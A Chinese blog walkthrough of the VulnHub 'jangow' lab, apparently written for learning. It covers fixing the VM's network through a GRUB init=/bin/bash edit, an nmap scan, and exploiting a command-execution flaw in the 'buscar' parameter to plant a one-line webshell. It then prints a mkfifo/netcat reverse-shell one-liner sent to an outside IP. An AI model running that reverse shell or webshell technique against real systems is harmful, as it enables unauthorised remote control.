当前位置: 首页 > news >正文

vuhub jangow-01-1.0.1靶场攻略

靶场下载

下载地址:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

靶场使用

配置网卡:

一开始扫描不到这个靶机,但是我确定虚拟机网络连接方式都没有问题,那么应该是靶机没连上网,上网搜了搜是网卡配置的不对。那我们先配置一下网卡:

重启虚拟机,在出现这个界面的时候赶紧操作。我们要配置*0p??es avan?adas para buntu,但是这个界面很短,我试了好几次只能是在进入这个页面后赶紧点e,进入Ubuntu,然后再点shift退出向下选择*0p??es avan?adas para buntu,再点e进入编辑。

 在编辑页面找到如下内容,把ro替换成rw signie init=/bin/bash

然后按ctrl+x,进入如下页面

输入命令:vi /etc/network/interfaces

按i进入编辑模式,把网卡改成ens33

按?wq保存退出

然后重启虚拟机就可以了。

扫描端口:

这时候靶场已经启动了,咱们现在要找到这个靶场。

靶场是网页形式的,我们要找他,首先需要找到靶场的IP地址已经开发的端口才能访问:

怎么找呢?我们看他的网段,查看该虚拟机的网络连接形式,右键左侧虚拟机名字,点设置,点网络适配器:

看出是nat模式。我们再点上方编辑,虚拟网络编辑器,nat模式

看到子网为192.168.163.1-192.168.163.255

我们用Nmap工具扫描一下这个网段:命令:nmap 192.168.163.1/24:

找到靶场地址为192.168.163.142

浏览器访问一下:

点一下site

靶场攻略

点右上角buscar进入如下页面

可以看到url里有参数,那么他可能存在的漏洞有sql注入、ssrf、文件包含、命令执行...

这里是命令执行漏洞:

输入ifconfig,显示:

那我们试着把一句话木马写进去

访问1.php

那蚁剑试着连一下

在蚁剑里输入rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 59.110.83.22 443 >/tmp/f 

在服务器上开启监听nc -lvnp 443

得到反弹shell

http://www.xdnf.cn/news/1196785.html

相关文章:

  • 简易 BMI 身体质量指数计算器
  • C++算法竞赛篇(六)一维数组题型讲解
  • 用哈希表封装Myunordered_map和Myunordered_set
  • mac neo4j install verifcation
  • mac配置多版本jdk
  • Python 列表推导式与生成器表达式
  • 【成功经验分享】Github Education (Github学生认证)认证
  • 数据江湖的“三国演义”:数据仓库、数据湖与湖仓一体的全景对比
  • RAG vs 微调
  • 使用uni-app开发一个点餐收银台系统前端静态项目练习
  • C 语言第 10 天学习笔记:字符串基础操作与相关函数
  • 机器学习特征选择 explanation and illustration of ANOVA
  • java开闭原则 open-closed principle
  • 影刀RPA_初级课程_玩转影刀自动化_网页操作自动化
  • 【机器学习深度学习】NLP评价指标 BLEU 和 ROUGE
  • python优秀案例:基于python flask实现的小说文本数据分析与挖掘系统,包括K-means聚类算法和LDA主题分析
  • 用KNN实现手写数字识别:基于 OpenCV 和 scikit-learn 的实战教学 (超级超级超级简单)
  • Kafka——消费者组消费进度监控都怎么实现?
  • 牛客周赛101 D题 题解
  • 五、搭建springCloudAlibaba2021.1版本分布式微服务-gateway网关
  • 力扣热题100----------53最大子数组和
  • 零基础学习性能测试第五章:Tomcat的性能分析与调优-Tomcat原理,核心配置项,性能瓶颈分析,调优
  • RAG(检索增强生成)
  • 探秘CommonJS:Node.js模块化核心解析
  • redis主从复制、哨兵机制底层原理
  • XML Schema 指示器:全面解析与深度应用
  • 齐护Ebook科技与艺术Steam教育套件 可图形化micropython Arduino编程ESP32纸电路手工
  • xgboost 机器学习在生物信息学中的应用
  • 【橘子分布式】gRPC(番外篇-客户端重试机制)
  • PostGIS面试题及详细答案120道之 (021-030 )